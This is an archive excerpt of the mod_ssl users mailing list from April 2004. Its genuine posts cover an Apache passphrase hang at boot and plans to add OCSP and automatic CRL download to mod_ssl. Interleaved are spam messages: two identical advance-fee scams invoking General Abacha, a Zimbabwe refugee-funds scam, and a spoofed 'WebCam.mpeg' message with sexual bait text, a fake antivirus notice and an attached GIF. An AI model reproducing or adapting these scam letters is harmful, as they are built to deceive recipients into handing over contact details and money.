Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i3LBgmpI026405
	for ; Wed, 21 Apr 2004 13:42:48 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: FW: mod ssl freezes when booting up
Date: Wed, 21 Apr 2004 13:42:47 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Importance: normal
Thread-Topic: mod ssl freezes when booting up
Thread-Index: AcQnj5rsnCf/sZXZR8yz258pAgrsowABT0mQAAA2K/A=
From: "Boyle Owen" 
To: "mod_ssl list (E-mail)" 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: C G [mailto:csgcsg39@hotmail.com]

Please don't alter the mail header. Keep the messages on-list.

>
> Yes the key the is encrypted. When I start apache as root and 
> log on, it 
> asks me for a pass phrase. But when apache tries to start at 
> boot-up it just 
> hangs, no pass-phrase.

This is the problem. Apache is waiting for the passphrase but who is it
supposed to ask? Check out
http://www.modssl.org/docs/2.8/ssl_faq.html#ToC26

Personally, I think there is no point in encrypting the certificate. The
"reason" you do it is to prevent anyone using your cert if they steal it
(so they cannot masquerade your site). However, if you have such an
insecure machine that there is a risk someone can copy a file which is
readable only by root, then you have no business running SSL on it. 

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored. 

> 
> > > Looking at the error log I get the messages:
> > > [Tue Apr 20 13:58:06 2004] [error] mod_ssl: Init: Private key
> > > not found
> >
> >This isn't good. What do you have for SSLCertificateKeyFile? Does the
> >path exist? Is it readable?
> Yes is there, and yes it is readable. I presume that apache 
> will start up as 
> root. So that shouldn't be the problem.
> 
> Someone else suggested that that I make apache boot-up last. 
> I changed 
> S90apache to  S99apache. It didn't work.
> 
> Another suggestion was to try $PATH and $LD_LIBRARY_PATH. I 
> don't think this 
> is the problem as everything is Debian, and I haven't put 
> anything in funny 
> positions.
> 
> Are there any other suggestions?
> 
> Thanks for the help
> 
> Colin
> 
> _________________________________________________________________
> Find a cheaper internet access deal - choose one to suit you. 
> http://www.msn.co.uk/internetaccess
> 
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From mrsmunor@tiscali.co.uk  Sun Apr 25 06:17:03 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mk-smarthost-4.mail.uk.tiscali.com (mk-smarthost-4.mail.uk.tiscali.com [212.74.114.40])
	by master.modssl.org (Postfix) with ESMTP
	id 7C59EA8959; Sun, 25 Apr 2004 06:17:02 +0200 (CEST)
Received: from mk-cpfront-2.mail.uk.tiscali.com ([212.74.114.4]:37048 helo=mk-cpfrontend.uk.tiscali.com)
	by mk-smarthost-4.mail.uk.tiscali.com with esmtp (Exim 4.30)
	id 1BHb3y-000Dj1-LL; Sun, 25 Apr 2004 05:16:18 +0100
Received: from [80.88.146.123] by mk-cpfrontend.uk.tiscali.com with HTTP; Sun, 25 Apr 2004 05:16:09 +0100
Date: Sun, 25 Apr 2004 05:16:09 +0100
Message-ID: <40763EA100031F04@mk-cpfrontend-2.mail.uk.tiscali.com>
From: "Mrs. Juliet Munor" 
Subject: CONTACT ME NOW TO SHOW YOUR INTEREST TO THIS BUSINESS PROPOSAL
Reply-To: mrs_juliet_munor@tiscali.co.uk
To: mrsmunor@tiscali.co.uk
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Dear friend,

Greetings!

I come to you with a sincere heart believing in the Almighty that you wil=
l
consider my plight and come to help and also benefit from your assistance=
.

My name is Mrs. Juliet Munor, Personal Assistant to former Nigeria Head
of State, Late General Sanni Abacha who died on the 8th of July 1998 whil=
e
in power.

Actually I got your contact from the Internet; please do not feel bad abo=
ut
it because I am compelled to reach you due to the situation I am to safeg=
uard
my money in question. Forgive me and come to my aid.

Please read the following carefully:

In early 1997, I fixed the sum of "Twenty million US dollars (US$20 Milli=
on)"
in a finance company. This money was meant for my volunteered personal su=
pport
in the campaign of the self-succession bid of my boss whom I am his perso=
nal
assistant, General Sanni Abacha. But to my greatest disappointment, he di=
ed
before the actualization of his aspiration. This amount was fixed with a
finance company which I will disclose to you in subsequent mail, as famil=
y
valuable In agreement with him. Before he passed on, he assured me of pro=
viding
for me, a foreign partner of his (since he is known and has a lot of fore=
ign
partners) when I am ready to claim my money. This has negated me to not
being able to claim my money myself even though I am the depositor and ow=
ner.

I write to ask for your aid for the money (consignment) to be transferred=

to your custody due to the fact that when I deposited this sum, I signed
that my foreign counterpart (as he advised me) would come to claim it and=

I did this for a more security reason.

Based on the business trust I hope to bestow on you, I implore you to com=
e
forward and receive the consignment containing the money in cash on my be=
half
from the security company for subsequent disbursement between you and I.
In fact we do not have enough money to sustain our family so, I will appr=
eciate
it if you can consider my plight and assist me. 

For your assistance, I am going to compensate you with 30% of the total
amount while the remaining 70% will be for me and my family. We hope to
invest part of our share in your country on any viable area of investment=

as you may advise us.

If you are interested, you will need to visit the Security Company to cle=
ar
the consignment containing the money. I assure you that the transaction
is 100% risk free and would be approached with all legalities and documen=
ts
would be provided to back my claim.

Please I implore you to keep this transaction absolutely secret so you sh=
ould
not in any way, disclose this business to any body no matter how close th=
e
person may be to you or your heart. I don't want people to expose it nega=
tively
or feel that you are going to be more opportuned than them and go forth
to say negative prayers concerning this transaction. I want you to contac=
t
me immediately so that we can proceed with the business.

Please on reply, it is very important that you enclose the below:

a. Your private email addresses that you often use
b. Most confidential mobile phone number/Telephone number
c. Fax number (if any)

Best regards,

Mrs. JULIET MUNOR.

REMEMBER TO CHECK YOUR MAIL EVERY DAY BECAUSE I WILL ALSO ENDEAVOUR TO DO=

THAT.

__________________________________________________
Broadband from an unbeatable =A315.99!

http://www.tiscali.co.uk/products/broadband/home.html?code=3DSM-NL-11AM




From mrs_munor2004@tiscali.co.uk  Tue Apr 27 03:26:07 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mk-smarthost-3.mail.uk.tiscali.com (mk-smarthost-3.mail.uk.tiscali.com [212.74.114.39])
	by master.modssl.org (Postfix) with ESMTP
	id 04922A8933; Tue, 27 Apr 2004 03:26:07 +0200 (CEST)
Received: from mk-cpfront-4.mail.uk.tiscali.com ([212.74.114.6]:36381 helo=mk-cpfrontend.uk.tiscali.com)
	by mk-smarthost-3.mail.uk.tiscali.com with esmtp (Exim 4.30)
	id 1BIHM4-0006SC-MJ; Tue, 27 Apr 2004 02:25:48 +0100
Received: from [80.88.146.123] by mk-cpfrontend.uk.tiscali.com with HTTP; Tue, 27 Apr 2004 02:25:50 +0100
Date: Tue, 27 Apr 2004 02:25:50 +0100
Message-ID: <40800C1000022044@mk-cpfrontend-4.mail.uk.tiscali.com>
From: "Mrs. Juliet Munor" 
Subject: CONTACT ME NOW TO SHOW YOUR INTEREST TO THIS BUSINESS PROPOSAL
Reply-To: mrs_juliet_munor@tiscali.co.uk
To: mrs_munor2004@tiscali.co.uk
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Dear friend,

Greetings!

I come to you with a sincere heart believing in the Almighty that you wil=
l
consider my plight and come to help and also benefit from your assistance=
.

My name is Mrs. Juliet Munor, Personal Assistant to former Nigeria Head
of State, Late General Sanni Abacha who died on the 8th of July 1998 whil=
e
in power.

Actually I got your contact from the Internet; please do not feel bad abo=
ut
it because I am compelled to reach you due to the situation I am to safeg=
uard
my money in question. Forgive me and come to my aid.

Please read the following carefully:

In early 1997, I fixed the sum of "Twenty million US dollars (US$20 Milli=
on)"
in a finance company. This money was meant for my volunteered personal su=
pport
in the campaign of the self-succession bid of my boss whom I am his perso=
nal
assistant, General Sanni Abacha. But to my greatest disappointment, he di=
ed
before the actualization of his aspiration. This amount was fixed with a
finance company which I will disclose to you in subsequent mail, as famil=
y
valuable In agreement with him. Before he passed on, he assured me of pro=
viding
for me, a foreign partner of his (since he is known and has a lot of fore=
ign
partners) when I am ready to claim my money. This has negated me to not
being able to claim my money myself even though I am the depositor and ow=
ner.

I write to ask for your aid for the money (consignment) to be transferred=

to your custody due to the fact that when I deposited this sum, I signed
that my foreign counterpart (as he advised me) would come to claim it and=

I did this for a more security reason.

Based on the business trust I hope to bestow on you, I implore you to com=
e
forward and receive the consignment containing the money in cash on my be=
half
from the security company for subsequent disbursement between you and I.
In fact we do not have enough money to sustain our family so, I will appr=
eciate
it if you can consider my plight and assist me. 

For your assistance, I am going to compensate you with 30% of the total
amount while the remaining 70% will be for me and my family. We hope to
invest part of our share in your country on any viable area of investment=

as you may advise us.

If you are interested, you will need to visit the Security Company to cle=
ar
the consignment containing the money. I assure you that the transaction
is 100% risk free and would be approached with all legalities and documen=
ts
would be provided to back my claim.

Please I implore you to keep this transaction absolutely secret so you sh=
ould
not in any way, disclose this business to any body no matter how close th=
e
person may be to you or your heart. I don't want people to expose it nega=
tively
or feel that you are going to be more opportuned than them and go forth
to say negative prayers concerning this transaction. I want you to contac=
t
me immediately so that we can proceed with the business.

Please on reply, it is very important that you enclose the below:

a. Your private email addresses that you often use
b. Most confidential mobile phone number/Telephone number
c. Fax number (if any)

Best regards,

Mrs. JULIET MUNOR.

REMEMBER TO CHECK YOUR MAIL EVERY DAY BECAUSE I WILL ALSO ENDEAVOUR TO DO=

THAT.

__________________________________________________
Broadband from an unbeatable =A315.99!

http://www.tiscali.co.uk/products/broadband/home.html?code=3DSM-NL-11AM




From dubebogani1@netscape.net  Tue Apr 27 11:10:28 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mydomain.com (rndf-135-125.telkomadsl.co.za [165.165.135.125])
	by master.modssl.org (Postfix) with ESMTP id 0CABFA8933
	for ; Tue, 27 Apr 2004 11:10:26 +0200 (CEST)
Received: from mailin-03.mx.aol.com ([214.175.254.197]) by mailin-04.hotmail.com with SMTP
	id 01003C04;
	 Tue, 27 Apr 2004 09:10:42 -0000
Received: from mx1.mail.lycos.com ([48.139.164.214]) by mx2.google.com with ESMTP
	id 17E24147;
	 Tue, 27 Apr 2004 09:10:32 -0000
Received: from mx3.excite.com ([64.235.214.218]) by mx4.linksynergy.com with esmtp (Exim 3.35 #1)
	id 05E574CF;
	 Tue, 27 Apr 2004 09:10:22 -0000
Date: Tue, 27 Apr 2004 11:10:22 +0200
From: dubebogani1@netscape.net
To: dubebogani1@netscape.net
Subject: URGENT BUSINESS ASSISTANCE NEEDED
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Message-Id: <20040427091026.0CABFA8933@master.modssl.org>

MR. DUBE BOGANI
E-mail-dubebogani1@netscape.net


ATTN: PRESIDENT/CEO 

I am Mr. DUBE BOGANI, a member of the Movement for Democratic Change in 
Zimbabwe. My Party is opposed to the Zanu-PF Party of the incumbent President Robert 
Mugabe. I went into a partnership with a white farmer and businessman in 
Zimbabwe and as we progressed in business, I bought his ideas and philosophy, 
which made me join the movement for democratic change which is dominated by the 
whites (of which my colleague is a top member). 
We control the greater portion of the white-dominated farms in Zimbabwe and we 
are major shareholders in major companies in Zimbabwe. The Mugabe government and 
his political associates are not tolerant to the activities of the movement for 
democratic change and he is using indirect guerrilla war tactics to oppress the 
members. 
Zimbabwe war veterans invaded our farms and confiscated some of our assets and 
held us hostage. I managed to escape from their brutality but my business 
partner died in the struggle. He left a message that I should sell off all our 
assets including the farms, estates and the companies, ensuring that his family 
relocates overseas and also to invest the money properly bearing in mind that 
the next step of the guerillas will be to confiscate those remaining assets. 

I have successfully sold off the remaining portion of our estates, farms and 
companies after which I managed with the help of the immigration to sneak into 
Johannesburg, South Africa, with the money and my colleague’s family. In fact, 
we are seeking refuge in South Africa at this moment. The total sum in our 
possession at this moment is the sum of US$18 M (Eighteen Million US Dollars), 
realized from auction, sales of the estates, farms and companies. The money is 
secured in a Security Company because we are not authorized to open an account 
as refugees. 
I got to know you from your country’s business journal in Johannesburg world 
Trade Centre (WTC) and from my careful analysis I realized that you could assist 
in this venture. All I want you to do is to make urgent arrangement and come to 
Johannesburg, South Africa, so that you could open a non-resident account, which 
would aid us in transferring the money into your nominated account overseas for 
onward investment. 
I have two options for you; the first is that you could choose to have a certain 
agreeable percentage of the money for nominating your account for this 
transaction. The other is that you could as well go into a joint business 
partnership with me for proper investment of the fund in your country. 
Whichever, way you want it, feel free to notify me. I have also mapped out 5% of 
the money for all kinds of expenses incurred in the process of the transaction 
and if you do not prefer joint partnership, I am offering you 20% of the fund, 
while the rest of 75% will be for my investment. 
Contact me with the above Telephone or fax numbers while still maintaining the 
secrecy required in this transaction. Please include your private telephone and 
fax numbers in your reply. 

Yours truly, 

MR.DUBE BOGANI


From owner-modssl-users@modssl.org  Wed Apr 28 07:14:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BBA94A8940; Wed, 28 Apr 2004 07:14:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.27.176.156 (ACC40E8F.ipt.aol.com [172.196.14.143])
	by master.modssl.org (Postfix) with SMTP id BB873A893B
	for ; Wed, 28 Apr 2004 07:14:04 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: FW: File - WebCam.mpeg
Date: 27 Apr 2004 22:18:57 -0800
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20040428051404.BB873A893B@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


hey guys my name is April Goostree i am a sexy 22 yr old bbw , 5'9, 48 dd , big ole booty, jus lovin life, until i get my pics posted in here you can either check out my profile or join my own yahoo group Texas-Sexy@groups.msn.com, either way works for me..i hope to become very active in this group, i like to get to know people, like to get on cam once in a while, jus to chill, when they aint none home..thats why its once in a while yaknow..anyways jus holla at me... n thanks for lettin me join!!! kisses kandee..Bye
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 28 15:47:02 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DA997A8940; Wed, 28 Apr 2004 15:47:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fornax_serv.com (host-250.FORNAKS.macomnet.net [212.5.90.250])
	by master.modssl.org (Postfix) with SMTP id 529AAA8934
	for ; Wed, 28 Apr 2004 15:46:57 +0200 (CEST)
Date: Wed, 28 Apr 2004 17:30:06 +0300
To: modssl-users@modssl.org
Subject: Re: Hello
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 28 16:23:56 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 259D9A893D; Wed, 28 Apr 2004 16:23:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from amer-mta01.csc.com (amer-mta01.csc.com [20.137.2.247])
	by master.modssl.org (Postfix) with ESMTP id E7CE4A893B
	for ; Wed, 28 Apr 2004 16:23:54 +0200 (CEST)
Received: from csc.com (va-fch32.csc.com [20.6.39.233])
	by amer-mta01.csc.com (Switch-3.1.2/Switch-3.1.0) with ESMTP id i3SEQp2G013467
	for ; Wed, 28 Apr 2004 10:26:51 -0400 (EDT)
To: modssl-users@modssl.org
Subject: OCSP addition
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.0.12   February 13, 2003
From: Marc Stern 
Message-ID: 
Date: Wed, 28 Apr 2004 16:22:58 +0200
X-MIMETrack: Serialize by Router on VA-FCH32/SRV/CSC(Release 6.0.3|September 26, 2003) at
 04/28/2004 10:28:34 AM,
	Serialize complete at 04/28/2004 10:28:34 AM
Content-Type: multipart/alternative; boundary="=_alternative 004F22CAC1256E84_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marc Stern 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 004F22CAC1256E84_=
Content-Type: text/plain; charset="us-ascii"

Hello,

I plan to add OCSP support to modssl (and also enhance CRL support - see 
the end of the e-mail).
I have the code for the OCSP check, but I'd like to check the integration 
with everybody, as I will give the code back to you - if you're 
interesting in it :-)

Here is what I currently plan:
1. Add a parameter "UseOCSP" in the config file
2. In function "ssl_callback_SSLVerify( )", replace the call to 
"ssl_callback_SSLVerify_CRL( )" by a call to a new function 
"ssl_callback_SSLVerify_Validity( )", with exactly the same parameters
3. In "ssl_callback_SSLVerify_Validity( )":
  - if the parameter "UseOCSP" is on, try an OCSP check
  - if the OCSP check failed because the certificate is revoked => return 
error
  - if the OCSP check succedded => return ok ("ok" is an input parameter, 
don't know what it is exactly)
  - call  "ssl_callback_SSLVerify_CRL( )" and return result

Do you see any problem with that ?
Is somebody interesting in testing that code, or even work on it ?

After that step, I will also add CRL automatic download. I will describe 
this in another e-mail.

Marc

--=_alternative 004F22CAC1256E84_=
Content-Type: text/html; charset="us-ascii"



Hello,



I plan to add OCSP support to modssl (and also enhance CRL support - see the end of the e-mail).

I have the code for the OCSP check, but I'd like to check the integration with everybody, as I will give the code back to you - if you're interesting in it :-)



Here is what I currently plan:

1. Add a parameter "UseOCSP" in the config file

2. In function "ssl_callback_SSLVerify( )", replace the call to "ssl_callback_SSLVerify_CRL( )" by a call to a new function "ssl_callback_SSLVerify_Validity( )", with exactly the same parameters

3. In "ssl_callback_SSLVerify_Validity( )":

  - if the parameter "UseOCSP" is on, try an OCSP check

  - if the OCSP check failed because the certificate is revoked => return error

  - if the OCSP check succedded => return ok ("ok" is an input parameter, don't know what it is exactly)

  - call  "ssl_callback_SSLVerify_CRL( )" and return result



Do you see any problem with that ?

Is somebody interesting in testing that code, or even work on it ?



After that step, I will also add CRL automatic download. I will describe this in another e-mail.



Marc


--=_alternative 004F22CAC1256E84_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 28 16:38:07 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0E1E2A8940; Wed, 28 Apr 2004 16:38:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from amer-mta01.csc.com (amer-mta01.csc.com [20.137.2.247])
	by master.modssl.org (Postfix) with ESMTP id 778B8A893B
	for ; Wed, 28 Apr 2004 16:37:50 +0200 (CEST)
Received: from csc.com (va-fch32.csc.com [20.6.39.233])
	by amer-mta01.csc.com (Switch-3.1.2/Switch-3.1.0) with ESMTP id i3SEel2G000802
	for ; Wed, 28 Apr 2004 10:40:47 -0400 (EDT)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: CRL automatic download
X-Mailer: Lotus Notes Release 5.0.12   February 13, 2003
From: Marc Stern 
Message-ID: 
Date: Wed, 28 Apr 2004 16:36:53 +0200
X-MIMETrack: Serialize by Router on VA-FCH32/SRV/CSC(Release 6.0.3|September 26, 2003) at
 04/28/2004 10:42:29 AM,
	Serialize complete at 04/28/2004 10:42:29 AM
Content-Type: multipart/alternative; boundary="=_alternative 0050696FC1256E84_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marc Stern 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 0050696FC1256E84_=
Content-Type: text/plain; charset="us-ascii"

Hello,

I plan to add CRL automatic download to modssl. I mean, when a certificate 
contains a CRL distribution point, use it to download the CRL just-in-time 
if it's not present in the local store, or if it's outdated, ...
I have the code to do the automatic download, but the integration in 
modssl doesn't look evident to me, as it's my first dive into your code.

Here is what I currently plan:
- In function "ssl_callback_SSLVerify( )", replace the call to 
"ssl_callback_SSLVerify_CRL( )" by a call to a new function 
"ssl_callback_SSLVerify_Validity( )", with exactly the same parameters
- In "ssl_callback_SSLVerify_Validity( )":
  - possibly perform an OCSP check (see my e-mail from today)
  - call  "ssl_callback_SSLVerify_CRL( )"
  - if the check failed because the certificate is revoked => return error
  - download the CRL
    (this could be quite long, I could get a time-out. Any idea about that 
?)
  - if the download failed => return error
  - write the CRL to the registered directory
  - create a link to the CRL with name {hash}.r0
    (can't I directly copy the file under that name ?)
  - add the CRL to the CRL store
    (or re-create totally the store ? This wouldn't be efficient)
  - call  "ssl_callback_SSLVerify_CRL( )" again

Do you see any problem with that ?
Is somebody interesting in participating in this, or simply discussing 
more in-depth details ?

Marc

--=_alternative 0050696FC1256E84_=
Content-Type: text/html; charset="us-ascii"



Hello,



I plan to add CRL automatic download to modssl. I mean, when a certificate contains a CRL distribution point, use it to download the CRL just-in-time if it's not present in the local store, or if it's outdated, ...

I have the code to do the automatic download, but the integration in modssl doesn't look evident to me, as it's my first dive into your code.



Here is what I currently plan:

- In function "ssl_callback_SSLVerify( )", replace the call to "ssl_callback_SSLVerify_CRL( )" by a call to a new function "ssl_callback_SSLVerify_Validity( )", with exactly the same parameters

- In "ssl_callback_SSLVerify_Validity( )":

  - possibly perform an OCSP check (see my e-mail from today)

  - call  "ssl_callback_SSLVerify_CRL( )"

  - if the check failed because the certificate is revoked => return error

  - download the CRL

    (this could be quite long, I could get a time-out. Any idea about that ?)

  - if the download failed => return error

  - write the CRL to the registered directory

  - create a link to the CRL with name {hash}.r0

    (can't I directly copy the file under that name ?)

  - add the CRL to the CRL store

    (or re-create totally the store ? This wouldn't be efficient)

  - call  "ssl_callback_SSLVerify_CRL( )" again



Do you see any problem with that ?

Is somebody interesting in participating in this, or simply discussing more in-depth details ?



Marc


--=_alternative 0050696FC1256E84_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

